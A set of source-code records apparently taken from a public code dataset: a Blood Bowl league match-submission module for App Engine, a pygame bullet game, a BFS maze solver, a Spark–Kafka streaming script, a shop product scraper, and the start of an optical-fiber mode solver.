CoachStats.all().ancestor(coach).get()\n coach_stats.update(team_record)\n coach_stats_list.append(coach_stats)\n\n # OFTL eligibility rule checks\n if not team.check_eligibility(season=season):\n team.set_flag(TeamProfile.INELIGIBLE_FLAG)\n\n # retirement (not by death)\n active_player_count = 0\n player_keys = [pr.player.key() for pr in team_record.playerrecord_set]\n for player in team.player_set:\n if not player.key() in player_keys:\n if player.retired == False:\n player.retired = True\n put_list.append(player)\n\n if not player.retired:\n active_player_count += 1\n\n # boost TV for potential loners\n if active_player_count < 11:\n team.tv += (11 - active_player_count) * 50\n\n # Update player information\n #--------------------------------------------------------------------#\n\n player_records = list(match.get_player_records_query())\n players = [record.player for record in player_records]\n\n # Structure to map to the already-updated player team.\n # We use this map because 'player.team' and the same team indexed in\n # 'teams' do not point to the same object. To avoid conflict we\n # update the one in 'teams' through the map\n team_map = dict((t.key(), t) for t in teams)\n\n # Keep track of the number of players that violate the SPP check. Allow one\n # violation for journeyman hire, which is impossible to track otherwise.\n violation_set = set()\n for player, player_record in zip(players, player_records):\n if not player.team:\n # journeyman / star player\n continue\n\n if player.matches == 0 and player_record.is_empty():\n # a journeyman/necro/nurgle hire that may have acquired SPP in-game\n continue\n\n if player.team.key() not in team_map:\n assert player_record.is_empty()\n # Unfortunately BB assigns a journeyman/necro/nurgle hire an arbitrary id\n # that may conflict with an existing OFTL player from a different team.\n # In this case, player.matches != 0. This code is a safety net.\n continue\n\n # this check is to make sure we only do this once (for idempotence) in case\n # of a retry\n if player.playerrecord_set.count() > player.matches:\n\n # OFTL rule checks\n if not assert_log.check(player_record.spp, player.spp,\n \"%s %s (%s) expected spp\" % (\n player.team.key().name(), player.name, player.key().name())):\n\n # allow one violation for a journeyman hire before setting the\n # inconsistent flag\n if player.spp != 0 or (player.team.key() in violation_set):\n team_map[player.team.key()].set_flag(TeamProfile.INCONSISTENT_FLAG)\n\n violation_set.add(player.team.key())\n\n tv_delta = player.update(player_record)\n if tv_delta:\n team_map[player.team.key()].tv += tv_delta\n\n put_list.extend(coach_stats_list)\n put_list.extend(teams)\n put_list.extend(players)\n batch_put(put_list)\n\n # Update Race Statistics\n #--------------------------------------------------------------------#\n update_race_statistics(teams, team_records)\n \n # Update leader information\n #--------------------------------------------------------------------#\n\n update_coach_leaders(coach_stats_list)\n update_team_leaders(teams)\n update_player_leaders(players)\n\n # Update tournament details\n #--------------------------------------------------------------------#\n\n match_up = match_lookup.tournamentmatchup_set.get() \n\n # disqualify team if played match outside of tournament\n for team in teams:\n active_membership = team.get_active_tournament_membership()\n if active_membership and (not match_up or\n match_up.parent().key() != active_membership.parent().key()):\n\n active_tournament = active_membership.parent()\n if active_tournament.started:\n mail.send_mail(\n sender=\"verification@bb-oftl-hrd.appspotmail.com\",\n to=\"balderasfam@gmail.com\",\n subject=\"OFTL rules violation\",\n body=\"%s played outside of %s\\n\" % (\n team.key().name(), active_tournament.key().name()))\n else:\n # force withdraw\n active_membership.delete()\n\n # there can only be one tournament for this match\n if match_up:\n tournament = match_up.parent()\n\n # determine the winner\n if team_records[0].result == 0:\n # decide the winner by a 'coin flip'. Seed the random number generator by\n # the match key to make it deterministic in case we need to retry\n random.seed(str(match.key()))\n winner_index = random.choice([0, 1])\n else:\n winner_index = 0 if team_records[0].result == 1 else 1\n\n winner = teams[winner_index]\n winner = winner.tournamentmembership_set.ancestor(tournament).get()\n\n loser = teams[winner_index ^ 1]\n loser = loser.tournamentmembership_set.ancestor(tournament).get()\n\n if match_up.advance(winner, loser, match):\n update_team_leaders([winner.team])\n\n views.TournamentBox.clear(tournament.key())\n views.Tournaments.clear()\n \n # Evict relevant pages from memcache so they are regenerated\n #--------------------------------------------------------------------#\n\n for team in teams:\n views.TeamBox.clear(team.key())\n\n for player in players:\n views.PlayerBox.clear(player.key())\n\n views.RecentMatches.clear()\n views.LeagueStandings.clear()\n views.TeamLeaders.clear()\n views.PlayerLeaders.clear()\n views.CoachLeaders.clear()\n views.GeneralStatistics.clear()\n\n assert_log.mail()\n logging.debug(\"update successful for %s\" % match_lookup.get_string())\n\ndef update_race_statistics(teams, team_records):\n # If two teams of same race are playing against each other then\n # we have to run race_stats.update(team_record) twice, once for each\n # team. THEN we can queue the put.\n \n put_list = []\n\n if (teams[0].race == teams[1].race):\n race_stats = RaceStats.all().filter(\"race =\", team.race).get()\n for team, team_record in zip(teams, team_records):\n race_stats.update(team_record)\n put_list.append(race_stats)\n else:\n for team, team_record in zip(teams, team_records):\n race_stats = RaceStats.all().filter(\"race =\", team.race).get()\n race_stats.update(team_record)\n put_list.append(race_stats)\n\n batch_put(put_list)\n \ndef update_coach_leaders(coach_stats_list):\n \"\"\"Update coach leader standings\"\"\"\n put_list = []\n\n # update leader standings for each Coach\n for leader in CoachLeader.all():\n for coach_stats in coach_stats_list:\n put_list.append(CoachLeaderStanding(\n key_name = coach_stats.parent().key().name(),\n parent = leader,\n coach_stats = coach_stats,\n score = leader.get_score(coach_stats)))\n\n batch_put(put_list)\n \ndef update_team_leaders(teams):\n \"\"\"Update team leader standings\"\"\"\n put_list = []\n\n # update leader standings for each team\n for leader in TeamLeader.all():\n for team in teams:\n if team.matches == 0:\n # pre-registered team\n continue\n\n put_list.append(TeamLeaderStanding(\n key_name = team.key().name(),\n parent = leader,\n team = team,\n score = leader.get_score(team)))\n\n batch_put(put_list)\n\n\ndef update_player_leaders(players):\n \"\"\"Update player leader standings\"\"\"\n put_list = []\n\n # update leader standings for each player\n for leader in PlayerLeader.all():\n for player in players:\n if not player.key().name() or player.played == 0:\n # omit journeymen/star players and players that have not played\n continue\n\n put_list.append(PlayerLeaderStanding(\n key_name = player.key().name(),\n parent = leader,\n player = player,\n score = leader.get_score(player)))\n\n batch_put(put_list)\n\n\ndef get_color(num):\n if num>55:\n num=55\n\t\n color_map = {\n 0: (85 , 209, 255),\n 1: (112, 254, 202),\n 2: (151, 246, 14 ),\n 3: (246, 255, 0 ),\n 4: (241, 186, 138),\n 5: (255, 123, 246),\n 6: (224, 104, 254),\n 7: (223, 229, 229),\n 8: (85 , 169, 255),\n 9: (0 , 255, 252),\n 10: (0 , 255, 0 ),\n 11: (255, 222, 0 ),\n 12: (255, 147, 147),\n 13: (255, 85 , 243),\n 14: (180, 123, 255),\n 15: (192, 191, 191),\n 16: (8 , 130, 255),\n 17: (3 , 219, 216),\n 18: (107, 221, 14 ),\n 19: (239, 189, 16 ),\n 20: (255, 83 , 83 ),\n 21: (246, 0 , 229),\n 22: (158, 85 , 255),\n 23: (170, 170, 170),\n 24: (20 , 60 , 212),\n 25: (2 , 168, 166),\n 26: (95 , 200, 9 ),\n 27: (204, 117, 41 ),\n 28: (244, 0 , 0 ),\n 29: (158, 0 , 147),\n 30: (106, 0 , 246),\n 31: (109, 109, 109),\n 32: (38 , 77 , 176),\n 33: (1 , 108, 107),\n 34: (77 , 111, 3 ),\n 35: (140, 78 , 29 ),\n 36: (180, 0 , 0 ),\n 37: (90 , 0 , 84 ),\n 38: (68 , 0 , 158),\n 39: (62 , 62 , 62 ),\n 40: (37 , 61 , 121),\n 41: (1 , 78 , 64 ),\n 42: (40 , 74 , 7 ),\n 43: (90 , 55 , 25 ),\n 44: (128, 0 , 0 ),\n 45: (54 , 37 , 78 ),\n 46: (48 , 4 , 105),\n 47: (24 , 24 , 24 ),\n 48: (21 , 35 , 69 ),\n 49: (1 , 45 , 37 ),\n 50: (27 , 50 , 5 ),\n 51: (52 , 29 , 9 ),\n 52: (74 , 0 , 0 ),\n 53: (31 , 21 , 45 ),\n 54: (28 , 2 , 60 ),\n 55: (14 , 14 , 14 ),\n }\n\n def get_two_char_hex_string(val):\n s = str(hex(val))[2:4]\n if len(s) == 1:\n s = \"0\" + s\n return s\n\n return '#' + \"\".join(get_two_char_hex_string(val) for val in color_map[num])\n\n\ndef get_logo(logo):\n logo = \"logo_%s.png\" % logo.lower()\n logos = open(\"./logos.txt\")\n for line in logos:\n if line.strip() == logo:\n break\n else:\n logo = \"logo_neutre_07.png\"\n logos.close()\n return logo\n\n\n", "repo_name": "midnjerry/bb-oftl-hrd", "sub_path": "grappl/submit.py", "file_name": "submit.py", "file_ext": "py", "file_size_in_byte": 24670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.debug", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 73, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.run_in_transaction", "line_number": 74, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 74, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 79, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 86, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue.add", "line_number": 89, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue", "line_number": 89, "usage_type": "name"}, {"api_name": "misc.AssertLog", "line_number": 107, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 115, "usage_type": "call"}, {"api_name": "misc.AssertLog", "line_number": 135, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 159, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 159, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 159, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 160, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 160, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 160, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 166, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 166, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 166, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 173, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 173, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 173, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 242, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 321, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 321, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 379, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 380, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 393, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.put", "line_number": 394, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 394, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 397, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 409, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue.add", "line_number": 413, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue", "line_number": 413, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 422, "usage_type": "call"}, {"api_name": "misc.AssertLog", "line_number": 424, "usage_type": "call"}, {"api_name": "misc.get_ofl_season_and_week", "line_number": 425, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 442, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 442, "usage_type": "attribute"}, {"api_name": "grappl.utils.batch_put", "line_number": 521, "usage_type": "call"}, {"api_name": "google.appengine.api.mail.send_mail", "line_number": 547, "usage_type": "call"}, {"api_name": "google.appengine.api.mail", "line_number": 547, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 565, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 566, "usage_type": "call"}, {"api_name": "views.TournamentBox.clear", "line_number": 579, "usage_type": "call"}, {"api_name": "views.TournamentBox", "line_number": 579, "usage_type": "attribute"}, {"api_name": "views.Tournaments.clear", "line_number": 580, "usage_type": "call"}, {"api_name": "views.Tournaments", "line_number": 580, "usage_type": "attribute"}, {"api_name": "views.TeamBox.clear", "line_number": 586, "usage_type": "call"}, {"api_name": "views.TeamBox", "line_number": 586, "usage_type": "attribute"}, {"api_name": "views.PlayerBox.clear", "line_number": 589, "usage_type": "call"}, {"api_name": "views.PlayerBox", "line_number": 589, "usage_type": "attribute"}, {"api_name": "views.RecentMatches.clear", "line_number": 591, "usage_type": "call"}, {"api_name": "views.RecentMatches", "line_number": 591, "usage_type": "attribute"}, {"api_name": "views.LeagueStandings.clear", "line_number": 592, "usage_type": "call"}, {"api_name": "views.LeagueStandings", "line_number": 592, "usage_type": "attribute"}, {"api_name": "views.TeamLeaders.clear", "line_number": 593, "usage_type": "call"}, {"api_name": "views.TeamLeaders", "line_number": 593, "usage_type": "attribute"}, {"api_name": "views.PlayerLeaders.clear", "line_number": 594, "usage_type": "call"}, {"api_name": "views.PlayerLeaders", "line_number": 594, "usage_type": "attribute"}, {"api_name": "views.CoachLeaders.clear", "line_number": 595, "usage_type": "call"}, {"api_name": "views.CoachLeaders", "line_number": 595, "usage_type": "attribute"}, {"api_name": "views.GeneralStatistics.clear", "line_number": 596, "usage_type": "call"}, {"api_name": "views.GeneralStatistics", "line_number": 596, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 599, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 619, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 634, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 653, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 673, "usage_type": "call"}]}
+{"seq_id": "34414766495", "text": "import pygame\nimport os,sys\nimport Player\nimport pBullet\nimport Level\npygame.init()\n\nSCREENHEIGHT = 480\nSCREENWIDTH = 640\nscreen = pygame.display.set_mode((SCREENWIDTH,SCREENHEIGHT))\npygame.display.set_caption(\"Bullets\")\npygame.key.set_repeat(100,100)\nbackground = pygame.Surface(screen.get_size())\nbackground = background.convert()\nlevels = [Level.Level(\"A8B4C4D6\",650,SCREENHEIGHT,SCREENWIDTH,1),Level.Level(\"C4A2B3D1D2D3D4D5\",1100,SCREENHEIGHT,SCREENWIDTH,2)]\nactivelevel = 0\n#player = Player.Player(310,240,30,30,(0,0,255))\n#fbullet = pygame.sprite.Group()\nlastFiring = 0\nclock = pygame.time.Clock()\nwon = False\nscore = [0]\nscorefont = pygame.font.Font(None,40)\n\ndone = False\nwhile not done:\n if pygame.event.peek():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n done = True\n if event.key == pygame.K_LSHIFT:\n levels[activelevel].player.focus(True)\n if event.key == pygame.K_UP:\n levels[activelevel].player.moveV(-6)\n if event.key == pygame.K_DOWN:\n levels[activelevel].player.moveV(6)\n if event.key == pygame.K_RIGHT:\n levels[activelevel].player.moveH(6)\n if event.key == pygame.K_LEFT:\n levels[activelevel].player.moveH(-6)\n elif event.type == pygame.KEYUP:\n if not pygame.key.get_pressed()[pygame.K_UP] and not pygame.key.get_pressed()[pygame.K_DOWN]:\n levels[activelevel].player.moveV(0)\n if not pygame.key.get_pressed()[pygame.K_RIGHT] and not pygame.key.get_pressed()[pygame.K_LEFT]:\n levels[activelevel].player.moveH(0)\n if event.key == pygame.K_LSHIFT:\n levels[activelevel].player.focus(False)\n \n if pygame.key.get_pressed()[pygame.K_SPACE] and lastFiring > 200:\n bullet = levels[activelevel].player.shoot()\n levels[activelevel].collective.add(bullet)\n levels[activelevel].fbullet.add(bullet)\n lastFiring = 0\n background.fill(levels[activelevel].levelcolor)\n levels[activelevel].draw(background)\n screen.blit(background,(0,0))\n \n screen.blit(scorefont.render(\"Score \" + str(score[0]),0,(0,0,0)),(SCREENWIDTH/2-20,0))\n \n if levels[activelevel].update(score):\n activelevel += 1\n if activelevel >= len(levels):\n done = True\n won = True\n \n clock.tick(30)\n lastFiring += clock.get_time()\n \n #drawnRects.draw(background)\n \n pygame.display.flip()\n\n#endloop\nwhile won:\n \n if pygame.event.peek():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n won = False;\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n won = False\n background.fill((255,255,255))\n screen.blit(background,(0,0))\n screen.blit(scorefont.render(\"Your final score was \" + str(score[0]),1,(0,0,0)),(SCREENWIDTH/2-150,SCREENHEIGHT/2 -60))\n screen.blit(scorefont.render(\"YOU WIN!\",1,(0,0,0)),(SCREENWIDTH/2-100,0))\n screen.blit(scorefont.render(\"Press ESC to end\", 1,(0,0,0)),(SCREENWIDTH/2-100,400))\n pygame.display.flip()\n\n\npygame.quit()\n ", "repo_name": "montepy/PyBullet", "sub_path": "PyBulletPrimaryTesting/PyBulletPrimaryTesting/PyBulletPrimaryTesting.py", "file_name": "PyBulletPrimaryTesting.py", "file_ext": "py", "file_size_in_byte": 3436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.key.set_repeat", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 13, "usage_type": "call"}, {"api_name": "Level.Level", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.event.peek", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.K_LSHIFT", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_LSHIFT", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.event.peek", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 80, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 91, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 94, "usage_type": "call"}]}
+{"seq_id": "24674712233", "text": "import collections\r\nwall, clear, goal = 0, 1, 9 \r\nwidth,height=map(int,input().split())\r\n\r\ndef bfs(maze, start):\r\n queue = collections.deque()\r\n queue.append(start)\r\n seen = set([start])\r\n while queue:\r\n path = queue.popleft()\r\n print(path)\r\n x, y = path\r\n if maze[y][x] == goal:\r\n # print(maze[y][x])\r\n return True\r\n for x2, y2 in ((x+1,y), (x-1,y), (x,y+1), (x,y-1)):\r\n if ( 0 <= x2 < width and \r\n 0 <= y2 < height and \r\n maze[y2][x2] != wall and \r\n (x2, y2) not in seen): \r\n queue.append( (x2, y2))\r\n seen.add((x2, y2))\r\n return False\r\n\r\nmat=[list(map(int,input().split())) for i in range(height)]\r\n\r\nans = 0 if mat[0][0]==0 else bfs(mat,(0,0)) #check if start(0,0) is walkable or not if not return False else Run BFS\r\nprint(ans) #if path exist it will print True else prints False\r\n\r\n\r\n", "repo_name": "Rahul-p28/AI_LAB", "sub_path": "maze.py", "file_name": "maze.py", "file_ext": "py", "file_size_in_byte": 951, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.deque", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "24753402838", "text": "from pyspark import SparkContext\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.streaming.kafka import KafkaUtils\n\nsc = SparkContext(appName=\"PythonSparkStreamingKafka\")\nsc.setLogLevel(\"WARN\")\n\nssc = StreamingContext(sc, 10)\ndirectKafkaStream = KafkaUtils.createDirectStream(ssc, [\"quickstart-events\"], {\"metadata.broker.list\": \"192.168.33.13:9092\"})\n\ndirectKafkaStream.map(lambda x: x[1]).pprint()\n\n\n#Starting Spark context\nssc.start()\nssc.awaitTermination()\n", "repo_name": "Manal-98/Data-mining", "sub_path": "spark-streaming-kafka.py", "file_name": "spark-streaming-kafka.py", "file_ext": "py", "file_size_in_byte": 473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyspark.SparkContext", "line_number": 5, "usage_type": "call"}, {"api_name": "pyspark.streaming.StreamingContext", "line_number": 8, "usage_type": "call"}, {"api_name": "pyspark.streaming.kafka.KafkaUtils.createDirectStream", "line_number": 9, "usage_type": "call"}, {"api_name": "pyspark.streaming.kafka.KafkaUtils", "line_number": 9, "usage_type": "name"}]}
+{"seq_id": "26323773735", "text": "import requests\nfrom bs4 import BeautifulSoup\nfrom decimal import Decimal\nimport html\nfrom assistant.models import Product, Photo, Category\nfrom assistant.utils import get_file_ext, make_filename, get_and_save_image\nfrom currency.models import Currency\n\n\nclass ProductTemplate:\n\n def __init__(self, title, price, images, text, vendor_id, currency_id, available):\n self.title = title\n self.price = price\n self.images = images\n self.text = text\n self.vendor_id = vendor_id\n self.currency_id = currency_id\n self.available = available\n\n\nclass BaseHandler:\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'}\n category = Category.objects.get(title='TEST CATEGORY')\n\n def __init__(self, sourse):\n self.sourse = sourse\n self.content = None\n self.products = []\n self._set_currencies()\n self.vendor_name = sourse.rules['vandor_name'].lower()\n\n def _set_currencies(self):\n self.currencies = {i.code.upper(): i.id for i in Currency.objects.all()}\n\n def download_content(self):\n r = requests.get(self.sourse.url, headers=self.headers)\n if r.status_code == 200:\n self.content = r.text\n else:\n print('[ERROR] response status: {}'.format(r.status_code))\n\n def prepare_content(self):\n raise NotImplementedError()\n\n @staticmethod\n def decimal_or_none(digit_text):\n try:\n return Decimal(digit_text)\n except:\n return None\n\n @staticmethod\n def _download_image(path, product_pk):\n ext = get_file_ext(path)\n filename = make_filename(product_pk, ext)\n get_and_save_image(path, filename)\n return filename\n\n @staticmethod\n def _update_product(product, product_in_db):\n product_in_db.availability_prom = '+' if product.available else '-'\n product_in_db.active = product.available or False\n product_in_db.price = product.price\n product_in_db.save(update_fields=('availability_prom', 'price', 'active'))\n\n def _create_product(self, product):\n new_product = Product()\n new_product.category = self.category\n new_product.title = product.title\n new_product.price = product.price\n new_product.text = product.text\n new_product.vendor_id = product.vendor_id\n new_product.vendor_name = self.vendor_name\n new_product.currency_id = product.currency_id\n new_product.availability_prom = '+' if product.available else '-'\n new_product.active = product.available\n try:\n new_product.image = self._download_image(product.images[0], new_product.pk)\n except IndexError:\n pass\n new_product.save()\n\n try:\n for i in product.images[1:]:\n image = Photo()\n image.product = new_product\n image.image = self._download_image(i, new_product.pk)\n image.save()\n except IndexError:\n pass\n\n def create_or_update(self):\n for product in self.products:\n products_in_db = Product.objects.filter(\n vendor_id=product.vendor_id,\n vendor_name=self.vendor_name\n )\n if len(products_in_db) > 0:\n for product_in_db in products_in_db:\n self._update_product(product, product_in_db)\n else:\n self._create_product(product)\n\n def parse(self):\n print('[INFO] Parsing {}'.format(self.vendor_name))\n self.download_content()\n\n if self.content:\n self.prepare_content()\n else:\n print('[ERROR] Content is None in {}'.format(self.vendor_name))\n return False\n\n self.create_or_update()\n\n\nclass YMLYandexCatalogHandler(BaseHandler):\n\n def prepare_content(self):\n soup = BeautifulSoup(self.content, 'html5lib')\n mapping = self.sourse.rules['mapping']\n reset_currency = self.sourse.rules.get('reset_currency_code', False)\n\n for offer in soup.find_all(self.sourse.rules['cycle_tag']):\n try:\n product = ProductTemplate(\n title=html.unescape(offer.find(mapping['get_title']).text),\n price=self.decimal_or_none(offer.find(mapping['get_price']).text),\n images=[i.text for i in offer.find_all(mapping['get_image'])],\n text=html.unescape(offer.find(mapping['get_text']).text),\n vendor_id=offer.find(mapping['get_vendor_code']).text,\n currency_id=self.currencies.get(reset_currency.upper()) if reset_currency else self.currencies.get(\n offer.find(mapping['get_currency']).text.upper()),\n available=True if offer[mapping['get_available']] == 'true' else False,\n )\n self.products.append(product)\n except:\n print('[ERROR] Parsing error in VitanHandler')\n", "repo_name": "vintkor/django_ppf", "sub_path": "spider/utils/handlers.py", "file_name": "handlers.py", "file_ext": "py", "file_size_in_byte": 5132, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "assistant.models.Category.objects.get", "line_number": 25, "usage_type": "call"}, {"api_name": "assistant.models.Category.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "assistant.models.Category", "line_number": 25, "usage_type": "name"}, {"api_name": "currency.models.Currency.objects.all", "line_number": 35, "usage_type": "call"}, {"api_name": "currency.models.Currency.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "currency.models.Currency", "line_number": 35, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 50, "usage_type": "call"}, {"api_name": "assistant.utils.get_file_ext", "line_number": 56, "usage_type": "call"}, {"api_name": "assistant.utils.make_filename", "line_number": 57, "usage_type": "call"}, {"api_name": "assistant.utils.get_and_save_image", "line_number": 58, "usage_type": "call"}, {"api_name": "assistant.models.Product", "line_number": 69, "usage_type": "call"}, {"api_name": "assistant.models.Photo", "line_number": 87, "usage_type": "call"}, {"api_name": "assistant.models.Product.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "assistant.models.Product.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "assistant.models.Product", "line_number": 96, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 122, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 129, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 132, "usage_type": "call"}]}
+{"seq_id": "5107361753", "text": "import numpy as np\nfrom fiber import fiber\nfrom stretchmesh import stretchmesh\nfrom scipy.special import jv, kv\nfrom scipy.optimize import fsolve\nfrom contourmode import contour\n\nnco = 2.5\nncl = 1.5\nr = 0.3\nwl = 1\nside = 0.2\n\ndx = 0.002\ndy = 0.002\n\nx, y, eps = fiber([nco, ncl], [r], side, dx, dy)\nx, y = stretchmesh(x, y, [96, 0, 96, 0], [4, 1, 4, 1])\n\nV = 2 * np.pi * r / wl * np.sqrt(nco**2 - ncl**2)\n\n\ndef spam(U):\n return nco ** 2 * jv(1, U) / (U * jv(0, U)) + \\\n ncl ** 2 * kv(1, np.sqrt(V ** 2 - U ** 2)) / \\\n (np.sqrt(V ** 2 - U ** 2) * kv(0, np.sqrt(V ** 2 - U ** 2)))\n\n\nU = fsolve(spam, 3.2).item()\n\nW = np.sqrt(V**2 - U**2)\nneff0 = np.sqrt(nco**2 - (U / (2 * np.pi * r / wl))**2)\n\n\nx = x.reshape(-1, 1)\ny = y.reshape(1, -1)\nrho = np.sqrt(np.dot(x**2, np.ones(y.shape)) + np.dot(np.ones(x.shape), y**2))\n\nsinphi = np.divide(np.dot(np.ones(x.shape), y), rho)\ncosphi = np.divide(np.dot(x, np.ones(y.shape)), rho)\n\nHx0 = np.zeros(rho.shape)\nHy0 = np.zeros(rho.shape)\n\nfor index, value in np.ndenumerate(rho):\n if value == 0:\n Hx0[index] = 0\n Hy0[index] = 0\n elif value < r:\n Hx0[index] = -sinphi[index] * jv(1, U * value / r) / jv(1, U)\n 